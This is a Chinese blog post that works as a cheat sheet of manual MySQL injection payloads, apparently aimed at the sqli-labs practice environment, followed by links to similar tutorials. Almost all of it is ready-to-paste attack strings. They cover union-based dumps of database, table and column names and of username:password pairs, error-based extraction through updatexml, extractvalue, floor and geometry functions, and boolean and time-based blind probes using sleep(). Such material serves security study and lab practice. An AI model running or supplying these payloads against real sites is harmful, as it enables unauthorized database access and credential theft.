手工SQL注入语句

于 2024-08-27 13:35:45 发布
阅读量637 收藏 6
点赞数 19
文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64765239/article/details/141600678
版权

order by:判断有多少字段

and length(database())=8 -- + # 判断当前数据库名长度

1.暴库:select group_concat(schema_name) from information_schema.schemata;

2.暴表1:select group_concat(table_name) from information_schema.tables where

table_schema='security'; 加引号

暴表2:select table_name from information_schema.tables where

table_schema='security' limit 3,1; 加引号

3.暴字段1:select group_concat(column_name) from information_schema.columns where

table_name='users' and table_schema='security'; 加引号

暴字段2:select column_name from information_schema.columns where

table_name='users' and table_schema='security' limit 1,1;

4.暴字段值:select group_concat(username,0x3a,password) from security.users; 不加

引号

select group_concat(username,0x3a,password) from security.users; # 查询指定库中表

的某些字段值

payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from

security.users -- +

报错常用函数

# 1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat((select

user()),floor(rand(0)*2))x from information_schema.tables group by x)a);

# 2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

# 3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

# 4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

# 5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

# 6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

# 7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

# 8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

# 9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

# 10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

暴库

substr

payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),0,32),0x7e),1)); --+

limit

payload: id=1' and (updatexml(1,concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1)); -- +

' OR updatexml(1,concat(0x2a,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1) OR '

暴表

payload: id=1' and (updatexml(1,concat(0x7e,substr((select

group_concat(table_name) from information_schema.tables where

table_schema='security'),1,32),0x7e),1)); -- +

暴字段

payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and  table_schema='security'),1,32),0x7e),1)); -- +

暴数据

payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e),1)); -- +

布尔盲注

判断闭合符号

输入 id = 1' and 1 -- + 页面内容显示正常

输入 id = 1' and 0 -- + 页面显示不正常

由此判断出闭合符号位单引号

在进行暴库&&暴数据时都要先判断sql查询结果的长度,可以用二分法快速判断

延时注入:

and if(length(database()) = 8, sleep(3),1) -- + 判断长度

暴库

payload: id=1' and if((substr((select group_concat(schema_name) from information_schema.schemata),1,1)='i'),sleep(3),1) -- +

暴表

payload: id=1' and if((substr((select group_concat(table_name) from

information_schema.tables where table_schema='security'),1,1)='e'),sleep(3),1) -

- +

暴字段

payload: id=1' and if((substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,1)='i'),sleep(3),1) -- +

暴数据

payload: id=1' and if((substr((select group_concat(username,0x3a,password) from

security.users),1,1)='d'),sleep(3),1) -- +

联合查询:

select group_concat(schema_name) from information_schema.schemata; # 查询所有库

名,并拼接为一条数据

payload: id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- +

select group_concat(table_name) from information_schema.tables where table_schema='security'; # 查询security库中所有表名,并拼接为一条数据

payload: id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +

select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'; # 查询 security 库中 users 表中的所有字段值,拼接为一条数据

payload: id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' -- +

select group_concat(username,0x3a,password) from security.users; # 查询指定库中表的某些字段值

payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users -- +

黑白网安
关注
SQL手工注入语句详解
m0_66160077的博客
07-09 1706
mysql 手工注入方法============================================================================================================================================?id=1'语句作用:测试是否存在注入,报错则存在-------------------------------------------------------------------------------
SQL手工注入语句
m0_48368237的博客
02-28 633
看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)>0 access 4.注入参数是字符 ‘and&nb
手工SQL注入常用SQL语句
06-05
手工sql注入的一些常用语句,适合初学的时候看
手工注入常用SQL语句
weixin_34041003的博客
11-09 150
判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是access MSSQL: and (select id from sysobjects) >0 返回正常说明是mssql MySQL: and length(user())>0 返回正常说明是MySQL mysql: 1.判断版本 a...
SQL注入手工注入常用的语句
yusakul的博客
11-19 2477
判断是否存在注入 and 1=1 / and 1=2 回显页面不同(整形判断) 输入and 1=1和and 1=2后发现页面没有变化,判断不是整型注入 输入’ and 1=1 %23和 ’ and 1=2%23后发现页面变化,判断为字符注入数据库中 1=1 和1=2 后面随便输入字符串(相当于1=1和1=2后面的查询语句),发现select 1="1dasd"时返回1正确,1="2das...
手工SQL注入流程与常用语句
LCW991207的博客
01-26 1875
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。在这一步中,尝试去猜测出查询语句中的字段个数,如下注入语句所示,假设为字符型注入,先利用1’实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。查flag表记录的数量。
手工注入常用SQL语句.txt
07-18
手工SQL注入通常涉及利用已知漏洞,通过精心构造的SQL语句来探测数据库结构和数据。 ### 2. Access数据库手工SQL注入示例 对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from ...
sql注入手工注入示例详解
09-10
本文将深入讲解如何进行手工SQL注入,以帮助读者理解和掌握这个过程。 首先,我们需要识别注入点,即用户输入能够影响到SQL查询的地方。例如,在URL中的"id"参数(http://localhost/sqlilabs/Less-2/?id=1)就是一...
mysql 手工sql注入_SQL注入手工篇)
weixin_33461476的博客
02-01 267
开发人员在开发Web系统时对输入的数据没有进行有效的验证及过滤,就存在引发SQL注入漏洞的可能,并导致查看、插入、删除数据库的数据,甚至可以执行主机系统命令。1.可能出现asp?id=x的网站只能是基于asp、PHP、jsp、aspx的动态网站,并且存在数据库交互,例:登陆、留言板、搜索、新闻。但是静态页面不可以,如html、htm。2.漏洞测试(1)单引号测试:在页面中执行命令时使用成对单引号和...
SQL注入手工注入常用语句合集
自知.的博客
03-11 1071
【代码】【SQL注入手工注入常用语句合集、拿来就能用的手工注入常用语句合集、手工sql注入常用语句
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4224
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 1528
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
SQL注入(四)手工注入攻击步骤
热门推荐
pumpkin9
05-05 4万+
以bugkuctf平台的一道题为例:链接http://120.24.86.145:8002/chengjidan/ 0)首先测试正常数据。 链接的结尾添加【?id=1(数字任意)】 1) 判断是否存在注入点; 【?id=32(数字任意)】链接的结尾依次添加语句【‘】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。尝试在正常数据后加上单引号,发现数据为空,加...
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 8479
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL 手工注入
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
SQL手工注入
Megumiwind的博客
08-08 1757
什么是SQL注入: SQLi,sql injection,称之为SQL注入。何为SQL,英文:Structured Query Language,又叫结构化查询语言,用户在输入中注入SQL语法,破坏原有的SQL结构,达到编写程序时意料之外结果的攻击行为,被称为sql注入。 如何找到SQL注入点: 黑盒测试: 看见URL中的动态参数就想搞点事情,概念性验证 工具跑,老夫就是江湖人称脚本小子的物种 扫描器(AWVS等)扫+手动验证 Burp抓流量,调用SQLMAP API验证 代码审计 ...
Shell编程脚本
m0_48368237的博客
11-03 463
Shell脚本编程 l Shell命令行的运行 l编写、修改权限和执行Shell程序的步骤 在Shell程序中使用参数和变量 表达式比较、循环结构语句和条件结构语句 在Shell程序中使用函数和调用其他Shell程序 Shell命令行书写规则 u Shell命令行的书写规则 对Shell命令行基本功能的理解有助于编写更好的Shell程序,在执行Shell命令时多个命令可以在一个命令行上运行,但此时要使用分号(;)分隔命令,例如: [root@localhost root]# ls a* -l;free;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值